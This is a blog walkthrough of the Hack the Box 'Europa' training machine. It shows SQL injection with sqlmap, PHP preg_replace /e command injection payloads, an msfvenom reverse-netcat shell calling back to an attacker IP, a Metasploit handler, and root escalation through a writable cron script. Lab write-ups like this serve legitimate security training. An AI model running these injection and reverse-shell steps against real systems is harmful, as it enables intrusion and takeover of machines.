Hack the Box Challenge: Europa Walkthrough
Hello friends!! Today we are going to solve another CTF challenge “Europa” which is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience leve. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.
Level: Hard
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.22 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.22
From given below image, you can observe we found port 22, 80 and 443 are open in victim’s network.
As you have seen in our all previous lab that we love to explore target IP via port 80 on our web browser, similarly we follow that traditional in this also but Bad Unluckily!! This time it didn’t work at all.
Now the last option was to add target IP inside /etc/host file since port 443 was open containing two domain names and as it is a challenge of hack the box thus I edit europacorp.htb and admin-portal.europccorp.htb as host name.
Then I explore domain name: admin-portal.europccorp.htb through web browser and found following login page as shown below.
In order breach confidentiality we can try SQL form based attack and to do so I preferred sqlmap following command to enumerate data based name.
sqlmap -u https://ift.tt/2HqYimR –form –dbs –batch
Luckily our assumption set true and it dumbs the database name “admin”.
Then I run following command for enumerating entire table details.
sqlmap -u https://ift.tt/2HqYimR -D admin –dump-all –batch
Awesome!! I found a table “users” which 2 entries having username and password columns.
Using online MD5 decryption I cracked hash password and received “SupersecretPassword!” and use these credential for login into admin consol.
After fruitfully validation I got dashboard from where I step towards Tools options.
It was set up with a script for open VPN generator using the PHP function preg_replace() on user input. When I investigate more related to this function, it is suggested not to use preg_replace() on user input as it can lead to command execution vulnerability.
Considering above suggestion true, I fetched its request into burpsuite and sent it to repeater for exploit command injection vulnerability.
Here I notice three parameter pattern, ipaddress and test where we can add our arbitrary code for execution but before that you need to know correct step “how to exploit it” manually.
So when I search more related to this then I found so many link which was describing /e option is threat to PHP preg_replace function.
Now the code can be execute by sending http post request as given below format.
pattern=/ip_address/e&ipaddress=arbitrary command&text=ip_addres
For example: To check directory list we can run following command and verify resultant output.
pattern=/ip_address/e&ipaddress=ls &text=ip_addres
Similarly we can run any malicious code inside this for achieving reversion connection.
Using msfvenom following command we had generated malicious bash code for getting a reverse connection from victim’s machine at our listening port.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.6 lport=1234 R
As shown in below image, the size of generated payload is 101 bytes, now copy this malicious code and send it to target. After that start netcat/multi handler for accessing reverse connection and wait for getting its TTY shell.
Now if you will run above copied code then it will get failed in its mission therefore before running the ordinal code you need to encode it in URL encoding format and then copy the URL encoded code for execution.
Now I had pasted above encoded code as shown in below image and execute it with GO tab.
Meanwhile I return to my metasploit terminal and wait for metepreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload cmd/unix/reverse_netcat
msf exploit(multi/handler) set lhost 10.10.14.6
msf exploit(multi/handler) set lport 1234
msf exploit(multi/handler) exploit
From given below image you can observe command session1 opened for accessing victim tty shell then I upgrade command shell into meterpreter session.
Pleasing!! We have bind the shell of victims system, now let’s finish the task by grabbing user.txt and root.txt file and after traversing some directory I found user.txt file in /home/john
Meterpreter>sysinfo
Meterpreter>cd home
Meterpreter>cd john
Meterpreter>cat user.txt
Great!! Here we had completed 1st task now move to 2nd tasK
We start penetrating targets machine and after some time we came know about the clearlog file which has root privilege from inside contents of crontab file.
Using cat command we read contents of clearlogs here the cronjob was executing the shell script logcleared.sh with root permission.
Meterpreter>cat /etc/crontab
Meterpreter>cat /var/www/cronjaobs/clearlogs
Then we move into cmd directory and for spawning proper tty shell of target’s system we need to import python3 file therefore I run following command inside meterpreter shell
This time again we had use same payload cmd/unix/reverse_netcat generated malicious as above on a new port 5678 for reverse connection and copied the generated code and start netcat on a new terminal for getting reverse connection.
Then edit the above malicious code into logcleared.sh file with help of echo command and gave full permission as shown below.
nc -lvp 5678
WOW we got reverse connection from victims system with root access now let’s catch the flag and finished the task.
id
cd /root
cat flag.txt
Finally we have completed both task successfully and get juice experience.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Hack the Box Challenge: Europa Walkthrough appeared first on Hacking Articles.
from Hacking Articles https://ift.tt/2GKtxfo